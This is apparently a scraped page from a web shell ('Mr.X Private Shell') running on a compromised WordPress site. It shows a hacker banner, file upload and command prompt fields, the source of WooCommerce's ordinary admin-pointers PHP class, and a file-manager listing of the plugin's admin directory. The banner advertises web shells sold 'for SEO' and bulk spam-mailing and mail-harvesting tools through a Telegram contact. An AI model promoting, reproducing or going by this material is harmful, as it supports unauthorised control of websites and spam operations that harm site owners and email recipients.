__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * Adds and controls pointers for contextual help/tutorials
 *
 * @package WooCommerce\Admin\Pointers
 * @version 2.4.0
 */

use Automattic\WooCommerce\Internal\Admin\WCAdminAssets;
use Automattic\WooCommerce\Admin\Features\Features;

if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

/**
 * WC_Admin_Pointers Class.
 */
class WC_Admin_Pointers {

	/**
	 * Constructor.
	 */
	public function __construct() {
		add_action( 'admin_enqueue_scripts', array( $this, 'setup_pointers_for_screen' ) );
	}

	/**
	 * Setup pointers for screen.
	 */
	public function setup_pointers_for_screen() {
		$screen = get_current_screen();

		if ( ! $screen ) {
			return;
		}

		switch ( $screen->id ) {
			case 'product':
				$this->create_product_tutorial();
				$this->create_variable_product_tutorial();
				break;
			case 'woocommerce_page_wc-addons':
				$this->create_wc_addons_tutorial();
				break;
		}
	}

	/**
	 * Pointers for creating a product.
	 */
	public function create_product_tutorial() {
		if ( ! isset( $_GET['tutorial'] ) || ! current_user_can( 'manage_options' ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended
			return;
		}

		global $wp_post_types;

		if ( ! isset( $wp_post_types ) ) {
			return;
		}

		$labels          = $wp_post_types['product']->labels;
		$labels->add_new = __( 'Enable guided mode', 'woocommerce' );
		WCAdminAssets::register_script( 'wp-admin-scripts', 'product-tour', true );
	}

	/**
	 * Pointers for creating a variable product.
	 */
	public function create_variable_product_tutorial() {
		if ( ! current_user_can( 'manage_options' ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended
			return;
		}

		WCAdminAssets::register_script( 'wp-admin-scripts', 'variable-product-tour', true );
	}

	/**
	 * Pointers for accessing In-App Marketplace.
	 */
	public function create_wc_addons_tutorial() {
		if ( ! isset( $_GET['tutorial'] ) || ! current_user_can( 'manage_options' ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended
			return;
		}

		if ( wp_is_mobile() ) {
			return; // Permit In-App Marketplace Tour on desktops only.
		}

		WCAdminAssets::register_script( 'wp-admin-scripts', 'wc-addons-tour', true );
	}
}

new WC_Admin_Pointers();

Filemanager

Name Type Size Permission Actions
helper Folder 0775
importers Folder 0775
list-tables Folder 0775
marketplace-suggestions Folder 0775
meta-boxes Folder 0775
notes Folder 0775
plugin-updates Folder 0775
reports Folder 0775
settings Folder 0775
views Folder 0775
class-wc-admin-addons.php File 13.24 KB 0664
class-wc-admin-api-keys-table-list.php File 7.07 KB 0664
class-wc-admin-api-keys.php File 7.82 KB 0664
class-wc-admin-assets.php File 46.97 KB 0664
class-wc-admin-attributes.php File 20.67 KB 0664
class-wc-admin-brands.php File 26.21 KB 0664
class-wc-admin-customize.php File 2.5 KB 0664
class-wc-admin-dashboard-setup.php File 4.57 KB 0664
class-wc-admin-dashboard.php File 24.32 KB 0664
class-wc-admin-duplicate-product.php File 9.69 KB 0664
class-wc-admin-exporters.php File 7.43 KB 0664
class-wc-admin-help.php File 4.71 KB 0664
class-wc-admin-importers.php File 8.45 KB 0664
class-wc-admin-log-table-list.php File 13.18 KB 0664
class-wc-admin-marketplace-promotions.php File 11.53 KB 0664
class-wc-admin-menus.php File 19 KB 0664
class-wc-admin-meta-boxes.php File 9.99 KB 0664
class-wc-admin-notices.php File 23.74 KB 0664
class-wc-admin-permalink-settings.php File 9.1 KB 0664
class-wc-admin-pointers.php File 2.19 KB 0664
class-wc-admin-post-types.php File 36.49 KB 0664
class-wc-admin-profile.php File 9.85 KB 0664
class-wc-admin-reports.php File 8.42 KB 0664
class-wc-admin-settings.php File 39 KB 0664
class-wc-admin-setup-wizard.php File 85.87 KB 0664
class-wc-admin-status.php File 14.46 KB 0664
class-wc-admin-taxonomies.php File 17.72 KB 0664
class-wc-admin-upload-downloadable-product.php File 3.75 KB 0664
class-wc-admin-webhooks-table-list.php File 11.06 KB 0664
class-wc-admin-webhooks.php File 14.56 KB 0664
class-wc-admin.php File 13.6 KB 0664
wc-admin-functions.php File 18.92 KB 0664
wc-meta-box-functions.php File 13.71 KB 0664
woocommerce-legacy-reports.php File 535 B 0664
Filemanager